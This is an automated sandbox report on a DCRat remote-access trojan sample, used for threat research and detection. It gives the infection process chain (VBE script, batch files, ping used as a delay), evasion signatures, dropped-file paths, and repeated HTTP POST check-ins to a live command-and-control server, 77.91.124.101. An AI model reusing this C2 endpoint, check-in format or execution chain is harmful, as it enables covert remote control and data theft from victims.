Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
o9jDrpZrgR.exe

Overview

General Information

Sample Name:o9jDrpZrgR.exe
Original Sample Name:c256204deb01c77e21ba17b5e2411245.exe
Analysis ID:1345582
MD5:c256204deb01c77e21ba17b5e2411245
SHA1:95ae7fb9f6710368e44a3c4e839d3d7bebbd4d5e
SHA256:f594822a45b8561a9b7a2e2ecf17558a692b1a193cf231617ba1b222723ca3ab
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected DCRat
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
.NET source code contains potential unpacker
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
.NET source code contains very large strings
Machine Learning detection for dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
File is packed with WinRar
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • o9jDrpZrgR.exe (PID: 4308 cmdline: C:\Users\user\Desktop\o9jDrpZrgR.exe MD5: C256204DEB01C77E21BA17B5E2411245)
    • wscript.exe (PID: 5356 cmdline: "C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • BlockrefBrokerperf.exe (PID: 5520 cmdline: C:\reviewruntimeMonitor/BlockrefBrokerperf.exe MD5: 295BF8D9B734730EFA567C8DA9918FE1)
          • cmd.exe (PID: 5000 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 2468 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • qBJICEqiLNwXNBLrN.exe (PID: 6604 cmdline: "C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe" MD5: 295BF8D9B734730EFA567C8DA9918FE1)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
o9jDrpZrgR.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\reviewruntimeMonitor\BlockrefBrokerperf.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Click to see the 1 entries
              SourceRuleDescriptionAuthorStrings
              00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Click to see the 3 entries
                        SourceRuleDescriptionAuthorStrings
                        0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          0.3.o9jDrpZrgR.exe.657270c.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                            0.3.o9jDrpZrgR.exe.657270c.0.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                              5.0.BlockrefBrokerperf.exe.fc0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                                0.3.o9jDrpZrgR.exe.6e7d70c.1.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                                  No Sigma rule has matched
                                  Timestamp:192.168.2.577.91.124.10149712802048095 11/21/23-04:47:24.543305
                                  SID:2048095
                                  Source Port:49712
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\Desktop\KWPomPtF.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\Desktop\BnwYCmoX.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Users\user\Desktop\HJnNqbKj.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.batAvira: detection malicious, Label: BAT/Runner.IK
                                  Source: C:\Users\user\Desktop\MTqwIPIz.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Users\user\Desktop\qtmQsFEO.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\Desktop\pwLIWFpU.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                  Source: o9jDrpZrgR.exeReversingLabs: Detection: 65%
                                  Source: o9jDrpZrgR.exeVirustotal: Detection: 69%Perma Link
                                  Source: o9jDrpZrgR.exeAvira: detected
                                  Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exeReversingLabs: Detection: 79%
                                  Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exeVirustotal: Detection: 69%Perma Link
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeReversingLabs: Detection: 79%
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeVirustotal: Detection: 69%Perma Link
                                  Source: C:\Recovery\qBJICEqiLNwXNBLrN.exeReversingLabs: Detection: 79%
                                  Source: C:\Recovery\qBJICEqiLNwXNBLrN.exeVirustotal: Detection: 69%Perma Link
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exeReversingLabs: Detection: 79%
                                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exeVirustotal: Detection: 69%Perma Link
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeReversingLabs: Detection: 79%
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeVirustotal: Detection: 69%Perma Link
                                  Source: C:\Users\user\Desktop\BhRGcQzx.logVirustotal: Detection: 8%Perma Link
                                  Source: C:\Users\user\Desktop\BnwYCmoX.logVirustotal: Detection: 12%Perma Link
                                  Source: C:\Users\user\Desktop\GVjFENOl.logVirustotal: Detection: 7%Perma Link
                                  Source: C:\Users\user\Desktop\GbOXfjDL.logVirustotal: Detection: 7%Perma Link
                                  Source: C:\Users\user\Desktop\HJnNqbKj.logReversingLabs: Detection: 34%
                                  Source: C:\Users\user\Desktop\HJnNqbKj.logVirustotal: Detection: 32%Perma Link
                                  Source: C:\Users\user\Desktop\KWPomPtF.logReversingLabs: Detection: 34%
                                  Source: C:\Users\user\Desktop\KWPomPtF.logVirustotal: Detection: 32%Perma Link
                                  Source: C:\Users\user\Desktop\SoilvDeL.logVirustotal: Detection: 8%Perma Link
                                  Source: o9jDrpZrgR.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\fNssmckm.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\jTkAEhsC.logJoe Sandbox ML: detected
                                  Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\GbOXfjDL.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\GVjFENOl.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\lGVRPIpa.logJoe Sandbox ML: detected
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJoe Sandbox ML: detected
                                  Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJoe Sandbox ML: detected
                                  Source: o9jDrpZrgR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exeJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\9bce06a9fec5b2Jump to behavior
                                  Source: o9jDrpZrgR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: o9jDrpZrgR.exe
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0088A69B
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0089C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0089C220
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008AB348 FindFirstFileExA,0_2_008AB348
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeCode function: 4x nop then jmp 00007FF848F4C906h5_2_00007FF848F4C6ED
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeCode function: 4x nop then jmp 00007FF848F3C906h12_2_00007FF848F3C6ED

                                  Networking

                                  barindex
                                  Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.5:49712 -> 77.91.124.101:80
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 384Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
